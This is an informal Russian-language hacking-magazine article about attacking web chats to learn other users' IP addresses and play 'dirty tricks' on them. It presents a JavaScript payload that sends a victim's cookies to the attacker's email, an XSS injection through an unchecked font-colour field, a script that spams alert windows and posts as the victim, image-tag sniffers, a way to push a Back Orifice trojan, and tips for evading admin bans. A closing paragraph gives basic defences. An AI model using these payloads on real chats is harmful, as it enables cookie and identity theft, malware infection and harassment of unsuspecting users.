Внимание! Данная статья не имеет своей целью обучить чему-то новому кул хацкеров, она направлена прежде всего на низкий и средний уровень владения хакингом! Предупреждаю сразу!!!=))

Всем прет!!! Хотелось бы все-таки... извиниться перед не того ожидавшей аудиторией - вся проблема, честно говоря, состоит всего лишь в том, что эта статья (предыдущую имею в виду) для печати не предназначалась!!! Это была "проба пера", проверка стиля написания, так что, в принципе, все упреки безосновательны по причине того, что я не знал даже, что эта статья будет напечатана... Как так получилось: лежала мило она в папочке "Наброски", и вдруг в папке "Отправленные" Аутлука вижу письмо на адрес
xa@real.xakep.ru с вложенным файликом "Попытка не пытка, или пытаемся узнать Ip в html-чате"!!! Потом оказалось - старший братик "пошутил"... Ну я сразу на сайт, а там... упасть не встать... чуть в самом деле не упал... Ну да ладно - назвался грибом - полезай в корзину, взялся за гуж - не говори - не дюж, от меня не убыло, от своего авторства не отказываюсь... Придется теперь писать про чаты... Итак - обещанная вторая статья про то, как узнать IP в html-чате и еще несколько приколов из той же серии (напоминаю, первоначальное название редакция изменила) 

Но для начала еще немного про предыдущую статью... Почитал, говорю, я отзывы - и честно скажу: не обрадовали они меня... Пришлось самому отзыв на отзывы печатать, а это дело гнилое - ругаться с читателями... Ладно, сам виноват, надо было статьи писать не про чаты, а про определение ОСи или DoS-атаки... Социнженерия видно нынче не в почете...=(( А все-таки зря!!! Вдумайтесь: то что вы называете ламерской методикой, реально ни разу меня не подвело (так же как и сниффер, который кто-то там грозился написать - есть у меня свой, да и хакзоновский или любой другой юзать можно=), зато плюсов целая куча: меня ни разу не выкинули из чата, ни разу не убили, ни разу я ни с кем не ругался, если сам этого не хотел... Тем более что защита от большинства чат-снифферов предельно проста - либо намертво отрубить отображение картинок в свойствах Эксплорера, либо запретить для отображения все "прозрачные" теги (на некоторых чат-серваках это можно делать лично для себя)... А против головы, батеньки, нет приема, кроме другой головы, так что тут вопрос только в том, кто умнее и хитрее... Вы называете эту технологию ламерской, но вы сначала попробуйте добиться того, чтоб таким макаром получать IP хотя бы от 50% выбранных жертв... Вот тогда и скажите, что это раз плюнуть - развести "жертву" так, чтоб она сама без подозрений практически отдала вам в руки свой IP... Кто-то там, помню, говорил, что мол чего челу стоит отправить письмо, уйти и снова прийти? А что челу стоит после использования сниффера также уйти и зайти??? И еще - кто-то сказал, что эта методика рассчитана только на лохов - дык товарисчи, ваше дело и состоит в том, чтоб чел не догадался, что он лох, но стал бы им, хоть на время... Можно HDoS даже применить, но в рамках чата это трудновато. Так что - думайте сами, решайте сами... Ну а теперь, Федя, о главном=)) Поехали!

ВСЕ, КОМУ В ЛОМ ЧИТАТЬ ТАКУЮ ДЛИННУЮ СТАТЬЮ, МОГУТ... НЕ ЧИТАТЬ ЕЕ!!!=))

Предыстория

После обзора статей, посвященных взлому чатов, и почти четырехчасового лазанья по ссылкам, выданных родным Яндексом, я был немало обескуражен - на комбинацию слов "чат+взлом" система выдала мне больше 10000 ссылок... Когда я просмотрел 20 страниц, мне стало совсем плохо и я поставил перед собой тазик - реально из 100 ссылок я получил 6 (!!!!!) нормальных статей, первоначальное авторство которых было сложно установить... Тазик пригодился мне в первый раз... Возможно особо одаренные кул хацкеры бросятся проверить мой опыт и гордо воскликнут в мессаге "Брешешь, ламер, там их 10!!!", но это ничего не изменит... Все статьи - как под копирку. Когда я вчитался в содержание всех остальных статей, тазик пригодился второй раз... Я бы никогда не догадался, что вывод мата сквозь автоматическую систему фильтрации можно считать взломом чата!!! Периодически меняя тазики, я опытным путем добрался-таки до зерен истины, и... не обнаружил там для себя ничего нового!!! За прошедшие с моей последней попытки поинтересоваться взломом чатов полгода не добавилось ни одной нормальной новой статьи про взлом чатов, а уж про определение IP тем более... Тогда-то я и решился исправить это упущение.

Введение

До того, как рассмотреть нижеследующее, я хотел бы рассказать еще кое-что о чатах. На этот раз это будет не описанное в предыдущей статье физичекое устройство, а скорее факторы риска. Итак, на мой взгляд, все чаты можно разделить по уровню защиты на 4 уровня: 
1) Админа нет вообще - делайте что хотите=)
2) Админ вроде и есть, но фиговый или временно ушел покурить - аналогично, но побыстрее, пока он не вернулся или до него не дошло, что вы там собираетесь делать;)
3) Админ есть, но защита слабовата - рисует только IP - юзайте анонимную проксю и меняйте ее, если что нехорошее случится...
4) Админ есть, защита сильна - рисует вдобавок к IP и домен... Это не есть карашоу, это тяжелее... Но в принципе решается это дело тоже до гениального просто - подключаетесь через другого провайдера (через связь которого вас не выкидывали), заходите на сайт, отключаетесь и подключаетесь снова через первого. Все будет нормалек, а если вдруг опять выкинут - просто повторите всю шутку заново=) 

И еще - если что-то все-таки произошло и в чат вас не пускают никаким образом - попробуйте подчистить кукисы=)

Обзор вариантов западла в чатах

Основным методом взлома чатов является сохранение той формы, которую вы видите, заходя на сервак, на собственный хард, и изменения формы путем прописки полных адресов и замены строк типа
<input type=hidden name= cookie value=SP202134> на <input type=text name=cookie
value=SP202134> и последующей сборки окна чата из реальных и сохраненных фреймов. Делается это обычно так:

Start.htm - это и есть тот фрейм который нужно сохранить и изменить. 

Что это дает??? Возможность обойти зарегистрированные имена и сокрытие своего IP за чужим ID от киллеров. В дальнейшем над этой формой надо еще слегка поизвращаться и довести ее до ума, чтоб сделать отправку скриптов в общий фрейм легкой и приятной... Да, кстати, одной из возможных фенек является прописка скрипта в информацию о себе, которую вы даете при регистрации... Представьте только, как здорово - вы просто регистрируетесь, а каждый чел, который захочет глянуть вашу анкету, получает широкий спектр возможных подлянок - от простого захламления Рабочего стола ненужными окошками до впаривания трояна (где-то посерединке находится и получение IP или кукисов=) для примера привожу известный всем (вдруг не всем?) скрипт ЗАРАЗЫ aka Ученого Кота:

<script>

for( I=1 ; I<=11 ; I++ )

{
if( I==1 ) alert( "Че те надо?????" );
else alert( "Я тя " + ( (I==11)? "последни" : I ) + "й раз спрашиваю - че те надо???" );
}
alert("а здесь все равно нету нифика...");
top.frames['Inform'].document.forms[0].Accent.options[31].selected = 1;
top.frames['Inform'].document.forms[0].Announce.value = "Я люблю тебя, 3APA3A!";
top.frames['Inform'].document.forms[0].submit();
top.frames['Dark'].document.forms[2].submit();
</script>

Путем нехитрой модификации скрипта можно добиться поразительных результатов... Но признаюсь - я прописать скрипт в анкету не пробовал - тем более что дырка эта уже почти везде закрыта и регистрационные анкеты сначала просматривают админы...

Есть еще одна интересная штука:

<script language=javascript>
var cook=show_all_cookies();
document.open("cookies",cook);
document.write('< form onsubmit="javascript:window.close();"
method=post action="mailto:my_mail@mail.ru"
ENCTYPE="text/plain" >< input type=hidden
name=h1 value=',cook,'>< input type=submit value="Нажмите чтобы закрыть">
</form> ');
document.close("cookies");
</SCRIPT>

Как вы наверняка поняли, это западло, посылающее кукисы вашей жертвы вам на мыло, попробуйте оптимизировать его. Кукисы - это вещь, там хранится и IP жертвы, и ID в чате, и много всего остального, полезного-преполезного=)) Но, кстати, есть один минус - вы светите свое мыло (в примере, как вы поняли, my_mail@mail.ru) 

Модифицируют форму обычно следующим образом: в очень многих чатах, где посетителю позволяют выбрать цвет или размер текста,
как правило, вводимые им значения цвета не проверяются, можно, например, в качестве цвета вместо любимого значения 'black' задать '><script' (если тег печатается в чате как <FONT COLOR=black> Если печатаются кавычки (COLOR="black"), то задача несильно усложняется - надо всего лишь их нейтрализовать, например '"><script
p="' =) Как правило, тип шрифта указывается непосредственно перед фразой введенной посетителем. Так что в своей фразе вы теперь смело можете писать любой скрипт! Так мы имеем возможность закинуть Javascript в общее окно чата, что открывает обширные возможности... Но нужно отметить что засунуть закрывающий тег тоже может быть достаточно сложно, а без этого скрипт работать не будет. Впрочем, иногда скрипт просто удается засунуть в COLOR целиком.

Итак, путем, предназначенным для заподлянства в чате, в том числе и кражи IP, служит использование разрешенных тегов (в большинстве чатов теги вроде script естейственно запрещены, и обычно отправка скрипта осуществляется путем использования тега BGSOUND, EMBED, OBJECT, DIV и т.д., обычно это выглядит так:
<IMG SRC=" своих темных целей;-) Именно таким путем работают снифферы, например знаменитый чат-сниффер хакзоны, да и мои
не далеко ушли, с той только разницей, что лог ведется в другом месте... Самым простым способом является указание на чей-нибудь сниффер в теге SRC непосредственно в общем окне (как все помнят, данный тег выполняется на машине, никого не спрашивая, если только просмотр картинок не отключен) и все IP у вас в кармане. Рекомендую, зайдите на какой-нибудь простенький, но со вкусом чат, покопайтесь в исходнике фреймов, все что можно слейте себе на хард, полистайте книги и напишите свой сниффер, как гласит одно из определений словечка "хакер" это такой странный человек, которому больше нравится писать свои программы, чем использовать чужие=) Именно по этой причине я не даю ни одной ссылки на существующие в сети снифферы и не даю окончательных, применяемых мной вариантов приведенных скриптов дорабатывайте сами, труд, батенька, облагораживает человека, нужно учиться, учиться и еще раз учиться, как завещал великий Ленин, а не переписывать чужие скрипты это вам в голове ничего не прибавит... Мне конечно скриптов не жалко, но разозлили меня откликами на предыдущую статью (набросок имею в виду, где я оказался ЛАМЕРом aka ДЕБИЛом=) порядком, так что звиняйте, хлопцы, бананьев нэма... Но, все-таки, если людям захочется я ОБЕЩАЮ третью статью, где опубликую все окончательные результаты МОИХ исследований на тему взломов чата и защиты в чате (здесь же и ИРКа будет, наверно, приплетена, идеи и наброски на эту тему уже есть...)
Так что думайте. А пока продолжаем. Многих интересует вопрос - а почему сниффера или трояна обычно запускают из сети, а не с своего компьютера? Нельзя, мол, что ли??? Можно!!! Адрес для запуска должен выглядеть так: 127.0.0.1/c:\bo.exe где, что и ежу понятно, 127.0.0.1 - IP компа, у которого прямо на диске С хранится ваш любимый BO... Аналогично может впариваться любая другая примочка, включая скрипты и все прочее... Вот так вот. 

Теперь несколько слов о том, как защититься от всего того, что я тут расписал - прежде всего, перед заходом на чат отключите отображение картинок, если кто не знает как - в IE Сервис\Свойства обозревателя\Вкладка "Дополнительно", в разделе "Мультимедиа" снять галочку с "Отображать рисунки" - вы ничего не потеряете, в нужное время нужную картинку можно легко рассмотреть, кликнув правой
кнопкой и выбрав "Показать рисунок". Во-вторых - не ходите на ссылки, которые вам дают в чате, если не уверены на 100%, что это именно то, что вам нужно. В-третьих - юзайте анонимную проксю. В-четвертых - если возможно, то отключите для отображения все теги, с помощью которых на вашей машине может быть запущен скрипт. В-пятых - пользуйтесь презервативами... ой, кажется это из другой оперы!;-)

Это был КРАТКИЙ обзор информации по западлу и узнаванию IP в чате - уровень чуть выше, чем в предыдущей статье, главное знать html и javascript хотя бы на начальном уровне. Если поступят нормальные отклики на эту статью, то будет проведена серьезная исследовательская работа, распотрошена пара фирменных (моих=) скриптов и снифферов, приведены примеры конкретных взломов и т.д. - но на это должно уйти много времени, предупреждаю сразу. Поэтому следующая моя статья будет посвящена чему-нибудь имеющему более близкое отношение к хакингу - либо проблемам определения ОСи на удаленной машине (вручную=), либо DoS-атакам, либо... вообще не будет никакой статьи=) - все зависит, как всегда, от вашей реакции... В общем пишите на сайте отзывы - обязательно буду учитывать! Заранее благодарен за отзывы типа "Тоже херовенько, но явно лучше, чем в прошлый раз=)!!!

Check Also

Шах и мат! Как устроен нашумевший эксплоит checkm8 и как им воспользоваться

До недавнего времени джейлбрейка для iOS 13 не существовало. Точнее, до тех пор, пока хаке…

Оставить мнение